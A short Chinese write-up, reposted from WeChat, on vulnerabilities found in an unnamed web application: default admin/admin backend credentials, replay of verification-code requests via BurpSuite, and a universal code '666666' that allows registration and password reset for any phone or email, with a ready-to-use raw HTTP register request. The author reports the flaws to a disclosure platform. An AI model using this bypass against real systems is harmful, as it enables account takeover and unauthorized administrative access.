直接使用admin和admin即可进入后台管理系统;
直接“注册”用户,输入手机号或者邮箱获取验证码,BurpSuite抓包获取验证码的数据包,不断发送即可接收到验证码信息;
(备注:这里实际获取验证码有点问题,无法收到)
直接使用“666666”验证码即可跳转到下一步设置昵称、密码等信息;
选择“忘记密码”输入手机号或者邮箱获取验证码,输入:666666即可跳转到下一步直接设置新密码;
BurpSuite获取该数据包,替换其中内容即可;
POST /account/register HTTP/1.1Host:Content-Length: 186Accept: application/json, text/plain, */*operationID:User-Agent:Content-Type: application/jsonOrigin:Referer:Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en;q=0.8Connection: close{"verifyCode":"666666","autoLogin":true,"user":{"nickname":"替换","faceURL":"","areaCode":"+86","phoneNumber":"替换","password":"替换(MD5值)"}}
(补天漏洞响应平台审核速度蛮快的的,很加分!)
原文始发于微信公众号(青春计协):一次简单通用漏洞挖掘
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论